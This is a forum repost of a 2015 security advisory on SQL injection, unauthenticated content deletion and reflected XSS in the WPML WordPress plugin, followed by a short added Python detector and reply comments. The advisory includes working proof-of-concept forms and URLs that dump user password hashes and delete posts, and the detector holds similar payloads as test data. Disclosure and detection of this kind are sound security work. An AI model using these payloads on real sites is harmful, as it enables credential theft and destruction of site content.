Original poster: 90_

Multiple vulnerabilities in the WordPress WPML plugin

    Posted on 2015-3-15 12:52:05
    OVERVIEW
    ==========
     
    WPML is the industry standard for creating multi-lingual WordPress
    sites. Three vulnerabilities were found in the plug-in. The most
    serious of them, an SQL injection problem, allows anyone to read the
    contents of the WordPress database, including user details and
    password hashes, without authentication.
     
    System administrators should update to version 3.1.9.1 released
    earlier this week to resolve the issues.
     
     
     
    DETAILS
    ========
     
    1. SQL injection
     
    When WPML processes an HTTP POST request containing the parameter
    "action=wp-link-ajax", the current language is determined by parsing
    the HTTP referer. The parsed language code is not checked for
    validity, nor SQL-escaped. The user doesn't need to be logged in.
     
    By sending a carefully crafted referer value with the mentioned POST
    request parameter, an attacker can perform SQL queries on arbitrary
    tables and retrieve their results. In addition to the standard
    WordPress database and tables, the attacker may query all other
    databases and tables accessible to the web backend.
     
    The following HTML snippet demonstrates the vulnerability:
     
    <script>
    var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users";
    if (document.location.search.length < 2)
            document.location.search="lang=xx' UNION "+union+" -- -- ";
    </script>
     
    <form method=POST action="http://www.ihonker.org/comments/feed">
    <input type=hidden name=action value="wp-link-ajax">
    <input type=submit>
    </form>
     
    The results of the SQL query will be shown in the comments feed XML-formatted.
     
     
     
    2. Page/post/menu deletion
     
    WPML contains a "menu sync" function which helps site administrators
    to keep WordPress menus consistent across different languages. This
    functionality lacked any access control, allowing anyone to delete
    practically all content of the website - posts, pages, and menus.
     
    Example:
     
    <form method=POST
    action="http://www.ihonker.org/?page=sitepress-multilingual-cms/menu/menus-sync.php">
    <input type=hidden name="action" value="icl_msync_confirm">
    <input type=text name="sync" size=50 value="del[x][y][12345]=z">
    <input type=submit>
    </form>
     
    Submitting the above form would delete the row with the ID 12345 in
    the wp_posts database. Several items can be deleted with the same request.
     
     
     
    3. Reflected XSS
     
    The "reminder popup" code intended for administrators in WPML didn't
    check for login status or nonce. An attacker can direct target users
    to a URL like:
     
    http://www.ihonker.org/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f
     
     
    to execute JavaScript in their browser. This example bypasses the
    Chrome XSS Auditor.
     
    In the case of WordPress, XSS triggered by an administrator can lead
    to server-side compromise via the plugin and theme editors.
     
     
     
    CREDITS
    ========
     
    The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
    researching WordPress plugins falling in the scope of the Facebook bug
    bounty program.
     
    The vendor was notified on March 02, 2015 and the patch was released
    on March 10.
     
    Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/
     
    An up-to-date version of this document can be found on our website
    http://klikki.fi .
     
    [2015-03-15]
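As an added, defender-side example (not part of the advisory and not WPML's own code): a Python check over constructed request records, the fields a WAF or ModSecurity-style audit log exposes, that flags the three request shapes the advisory describes, together with the strict language-code check that the referer parser lacked. The regex, the record layout and the finding names are assumptions made here; a real fix validates the code against the site's configured languages and adds capability and nonce checks to the menu-sync and reminder-popup handlers.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed request records (not real traffic): the fields a WAF or a
# ModSecurity-style audit log exposes, so the POST body is visible too.
REQUESTS = [
    {"url": "http://site.invalid/comments/feed", "post": {"action": "wp-link-ajax"},
     "referer": "http://site.invalid/?lang=xx%27%20UNION%20select%20user_pass%20from%20wp_users%20--%20--%20"},
    {"url": "http://site.invalid/?page=sitepress-multilingual-cms/menu/menus-sync.php",
     "referer": "", "post": {"action": "icl_msync_confirm", "sync": "del[x][y][12345]=z"}},
    {"url": "http://site.invalid/?icl_action=reminder_popup&target=javascript%3Aalert%281%29",
     "referer": "", "post": {}},
    {"url": "http://site.invalid/comments/feed", "post": {"action": "wp-link-ajax"},
     "referer": "http://site.invalid/fr/?lang=fr"},
]

# Shape of a language code such as "fr" or "zh-hans". This regex is an assumption,
# not WPML's list; a real fix also checks the value against the configured languages.
LANG_RE = re.compile(r"^[a-z]{2,3}(-[a-z]{2,4})?$")

def valid_lang(code: str) -> bool:
    """True only for a well-formed code; quotes, spaces and SQL keywords fail."""
    return bool(LANG_RE.match(code))

def classify(req: dict) -> list:
    """Return the advisory's request patterns that this request matches."""
    findings = []
    post = req["post"]
    query = parse_qs(urlsplit(req["url"]).query)
    # 1. wp-link-ajax whose Referer carries a lang= value that is not a plain code
    if post.get("action") == "wp-link-ajax":
        ref_query = parse_qs(urlsplit(req["referer"]).query)
        if any(not valid_lang(v) for v in ref_query.get("lang", [])):
            findings.append("wpml-sqli-referer-lang")
    # 2. menu-sync confirm carrying del[...] entries; legitimate admins send these
    #    too, so correlate with an authenticated session before acting on it
    if post.get("action") == "icl_msync_confirm" and "del[" in post.get("sync", ""):
        findings.append("wpml-menu-sync-delete")
    # 3. reminder_popup whose target is not an http(s) or relative URL
    if query.get("icl_action") == ["reminder_popup"]:
        for target in query.get("target", []):
            scheme = urlsplit(re.sub(r"\s", "", target)).scheme.lower()
            if scheme not in ("", "http", "https"):
                findings.append("wpml-reminder-popup-xss")
    return findings

if __name__ == "__main__":
    for req in REQUESTS:
        print(req["url"][:70], "->", classify(req) or "clean")
```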

    Posted on 2015-3-15 13:01:38
    Thanks for sharing.
    Posted on 2015-6-27 20:38:12
    Learning the technique, keep it up!
    Posted on 2015-6-28 01:49:01
    Posted on 2015-6-30 09:22:12
    Supporting the China Honker Union (ihonker.org)
    Posted on 2015-7-1 03:59:06
    Support, this looks good!
    Posted on 2015-7-1 15:32:50
    Supporting the China Honker Union (ihonker.org)
    Posted on 2015-7-1 19:27:09
    Posted on 2015-7-2 18:06:06
    Thanks to the original poster for sharing~
    Posted on 2015-7-3 12:58:22